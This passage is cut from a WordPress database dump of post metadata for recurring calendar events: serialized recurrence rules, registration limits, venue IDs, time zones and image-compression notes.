03:00:00'),(104130,262441,'_EventDuration','3600'),(116317,262811,'boldgrid_hide_page_title','1'),(116318,262811,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116316,262811,'_RTECmaxRegistrations','30'),(116298,262810,'_EventShowMapLink','1'),(116299,262810,'_EventShowMap','1'),(116292,262810,'_RTECdeadlineType','start'),(132621,263855,'smush-info','The file was compressed from 168.30 KB to 164.23 KB saving 2.42 percent using WP-Optimize'),(132620,263855,'smush-complete','1'),(132619,263855,'original-file','2021/02/ninja-forms-success-bk-1-updraft-pre-smush-original.jpg'),(115124,262814,'_EventEndDate','2020-12-13 10:00:00'),(117364,262892,'_EventShowMap','1'),(115125,262814,'_EventStartDateUTC','2020-12-13 15:45:00'),(115126,262814,'_EventEndDateUTC','2020-12-13 17:00:00'),(115127,262814,'_EventDuration','4500'),(115128,262814,'_EventCurrencySymbol',''),(115129,262814,'_EventCurrencyPosition','prefix'),(115130,262814,'_EventCost',''),(115131,262814,'_EventURL',''),(115132,262814,'_EventTimezone','America/Denver'),(115133,262814,'_EventTimezoneAbbr','MST'),(116376,262857,'_EventShowMap','1'),(116377,262857,'_EventVenueID','262507'),(116378,262857,'_EventStartDate','2020-12-06 09:00:00'),(122362,263252,'_EventOrigin','events-calendar'),(122357,263252,'_EventEndDateUTC','2021-07-04 19:30:00'),(115097,262814,'_edit_lock','1619287969:2'),(115098,262814,'_edit_last','2'),(151824,266081,'mec_end_date','2021-12-21'),(115100,262814,'_RTECregistrationsDisabled','1'),(115101,262814,'_RTECdeadlineType','start'),(116329,262812,'protect_children',''),(116330,262812,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511472;s:12:\"_EventOrigin\";i:1607511472;s:13:\"_thumbnail_id\";i:1607511472;s:26:\"_RTECregistrationsDisabled\";i:1607511472;s:17:\"_RTECdeadlineType\";i:1607511472;s:19:\"_RTECwhoCanRegister\";i:1607511472;s:23:\"_RTEClimitRegistrations\";i:1607511472;s:21:\"_RTECmaxRegistrations\";i:1607511472;s:24:\"boldgrid_hide_page_title\";i:1607511472;s:16:\"_EventRecurrence\";i:1607511472;s:17:\"_EventShowMapLink\";i:1607511472;s:13:\"_EventShowMap\";i:1607511472;s:13:\"_EventVenueID\";i:1607511472;s:20:\"_EventCurrencySymbol\";i:1607511472;s:22:\"_EventCurrencyPosition\";i:1607511472;s:10:\"_EventCost\";i:1607511472;s:9:\"_EventURL\";i:1607511472;s:14:\"_EventTimezone\";i:1607511472;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511472;s:16:\"tribe_events_cat\";i:1607536672;}'),(116328,262812,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511472;s:12:\"_EventOrigin\";i:1607511472;s:13:\"_thumbnail_id\";i:1607511472;s:26:\"_RTECregistrationsDisabled\";i:1607511472;s:17:\"_RTECdeadlineType\";i:1607511472;s:19:\"_RTECwhoCanRegister\";i:1607511472;s:23:\"_RTEClimitRegistrations\";i:1607511472;s:21:\"_RTECmaxRegistrations\";i:1607511472;s:24:\"boldgrid_hide_page_title\";i:1607511472;s:16:\"_EventRecurrence\";i:1607511472;s:17:\"_EventShowMapLink\";i:1607511472;s:13:\"_EventShowMap\";i:1607511472;s:13:\"_EventVenueID\";i:1607511472;s:20:\"_EventCurrencySymbol\";i:1607511472;s:22:\"_EventCurrencyPosition\";i:1607511472;s:10:\"_EventCost\";i:1607511472;s:9:\"_EventURL\";i:1607511472;s:14:\"_EventTimezone\";i:1607511472;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511472;s:16:\"tribe_events_cat\";i:1607536672;}'),(132589,263792,'original-file','2021/02/white-horse-1-updraft-pre-smush-original.jpg'),(132590,263792,'smush-complete','1'),(132591,263792,'smush-info','The file was compressed from 21.39 KB to 20.70 KB saving 3.24 percent using WP-Optimize'),(117363,262892,'_EventShowMapLink','1'),(120903,263177,'_RTECnumRegistered','0'),(115119,262814,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115120,262814,'_EventShowMapLink','1'),(115121,262814,'_EventShowMap','1'),(115122,262814,'_EventVenueID','262507'),(115123,262814,'_EventStartDate','2020-12-13 08:45:00'),(116333,262812,'_RTECregistrationsDisabled','1'),(116334,262812,'_RTECdeadlineType','start'),(116335,262812,'_RTECwhoCanRegister','any'),(116336,262812,'_RTEClimitRegistrations','0'),(116337,262812,'_RTECmaxRegistrations','30'),(116331,262812,'_EventOrigin','events-calendar'),(116338,262812,'boldgrid_hide_page_title','1'),(116339,262812,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116319,262811,'_EventShowMapLink','1'),(116257,262808,'_EventShowMap','1'),(116258,262808,'_EventVenueID','262507'),(116259,262808,'_EventCurrencySymbol',''),(116256,262808,'_EventShowMapLink','1'),(116252,262808,'_RTEClimitRegistrations','0'),(116253,262808,'_RTECmaxRegistrations','30'),(116249,262808,'_RTECregistrationsDisabled','1'),(116250,262808,'_RTECdeadlineType','start'),(116251,262808,'_RTECwhoCanRegister','any'),(116247,262808,'_EventOrigin','events-calendar'),(116254,262808,'boldgrid_hide_page_title','1'),(116255,262808,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(120872,263177,'_EventOrigin','events-calendar'),(120900,263177,'_RTEClimitRegistrations','0'),(120901,263177,'_RTECmaxRegistrations','30'),(120902,263177,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(116694,262869,'_edit_last','2'),(115772,262796,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115769,262796,'_EventCost',''),(115770,262796,'_EventURL',''),(115771,262796,'_EventTimezone','America/Denver'),(151814,266081,'mec_hide_end_time','0'),(115734,262795,'_EventOrigin','events-calendar'),(114575,262795,'_EventEndDateUTC','2021-05-16 16:10:00'),(115679,262792,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132396,262519,'_EventOrigin','events-calendar'),(132397,262519,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132395,262519,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132377,262518,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-04-18\";s:14:\"EventStartDate\";s:19:\"2020-12-20 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 13:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(132376,262518,'boldgrid_hide_page_title','0'),(132378,262518,'_EventShowMapLink','1'),(132379,262518,'_EventShowMap','1'),(132380,262518,'_EventCurrencySymbol',''),(132381,262518,'_EventCurrencyPosition','prefix'),(132382,262518,'_EventCost',''),(132383,262518,'_EventURL',''),(132384,262518,'_EventTimezone','America/Denver'),(132385,262518,'protect_children',''),(132386,262518,'_EventNextPendingRecurrence','2022-12-18 11:30:00'),(132387,262518,'_RTECregistrationsDisabled','1'),(132388,262518,'_RTECdeadlineType','start'),(132389,262518,'_RTECwhoCanRegister','any'),(132390,262518,'_RTEClimitRegistrations','0'),(132391,262518,'_RTECmaxRegistrations','30'),(132392,262518,'_EventVenueID','262517'),(132374,262518,'_EventOrigin','events-calendar'),(132375,262518,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132373,262518,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";i:1613730641;s:24:\"boldgrid_hide_page_title\";i:1613730641;s:16:\"_EventRecurrence\";i:1613730641;s:17:\"_EventShowMapLink\";i:1613730641;s:13:\"_EventShowMap\";i:1613730641;s:20:\"_EventCurrencySymbol\";i:1613730641;s:22:\"_EventCurrencyPosition\";i:1613730641;s:10:\"_EventCost\";i:1613730641;s:9:\"_EventURL\";i:1613730641;s:14:\"_EventTimezone\";i:1613730641;s:16:\"protect_children\";i:1613730641;s:27:\"_EventNextPendingRecurrence\";i:1613730641;s:26:\"_RTECregistrationsDisabled\";i:1613730641;s:17:\"_RTECdeadlineType\";i:1613730641;s:19:\"_RTECwhoCanRegister\";i:1613730641;s:23:\"_RTEClimitRegistrations\";i:1613730641;s:21:\"_RTECmaxRegistrations\";i:1613730641;s:13:\"_EventVenueID\";i:1613730641;s:13:\"_thumbnail_id\";i:1613730641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1613730641;s:16:\"tribe_events_cat\";i:1613755841;}'),(132404,262519,'_EventCost',''),(132405,262519,'_EventURL',''),(132406,262519,'_EventTimezone','America/Denver'),(132407,262519,'protect_children',''),(132408,262519,'_EventNextPendingRecurrence','2022-12-18 11:30:00'),(132409,262519,'_RTECregistrationsDisabled','1'),(132410,262519,'_RTECdeadlineType','start'),(132411,262519,'_RTECwhoCanRegister','any'),(132412,262519,'_RTEClimitRegistrations','0'),(132413,262519,'_RTECmaxRegistrations','30'),(132414,262519,'_EventVenueID','262517'),(132416,262519,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:4:{i:262518;a:2:{s:9:\"timestamp\";i:1610883000;s:8:\"duration\";i:5400;}i:262519;a:2:{s:9:\"timestamp\";i:1613907000;s:8:\"duration\";i:5400;}i:262520;a:2:{s:9:\"timestamp\";i:1616326200;s:8:\"duration\";i:5400;}i:262521;a:2:{s:9:\"timestamp\";i:1618745400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:6:{i:262522;a:2:{s:9:\"timestamp\";i:1621164600;s:8:\"duration\";i:5400;}i:262523;a:2:{s:9:\"timestamp\";i:1624188600;s:8:\"duration\";i:5400;}i:262524;a:2:{s:9:\"timestamp\";i:1626607800;s:8:\"duration\";i:5400;}i:262525;a:2:{s:9:\"timestamp\";i:1629027000;s:8:\"duration\";i:5400;}i:262526;a:2:{s:9:\"timestamp\";i:1632051000;s:8:\"duration\";i:5400;}i:262527;a:2:{s:9:\"timestamp\";i:1634470200;s:8:\"duration\";i:5400;}}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151725,266078,'mec_read_more',''),(151726,266078,'mec_more_info',''),(120887,263177,'_EventStartDateUTC','2021-01-14 02:00:00'),(120871,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(151828,266081,'mec_end_day_seconds','72000'),(120899,263177,'_RTECwhoCanRegister','any'),(120870,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(120897,263177,'_RTECregistrationsDisabled','1'),(119666,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119609,262749,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119610,262749,'_dp_original','225321'),(119611,262749,'protect_children',''),(119612,262749,'_RTECregistrationsDisabled','1'),(119595,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119598,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119596,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119601,262749,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119602,262749,'_EventShowMapLink','1'),(119603,262749,'_EventShowMap','1'),(119599,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119604,262749,'_EventCurrencySymbol',''),(119588,262749,'_EventOrigin','events-calendar'),(119589,262749,'_EventOrigin','events-calendar'),(119590,262749,'_EventOrigin','events-calendar'),(119591,262749,'_EventOrigin','events-calendar'),(119592,262749,'_EventOrigin','events-calendar'),(119593,262749,'_EventOrigin','events-calendar'),(119594,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119613,262749,'_RTECdeadlineType','start'),(119614,262749,'_RTECwhoCanRegister','any'),(119587,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s: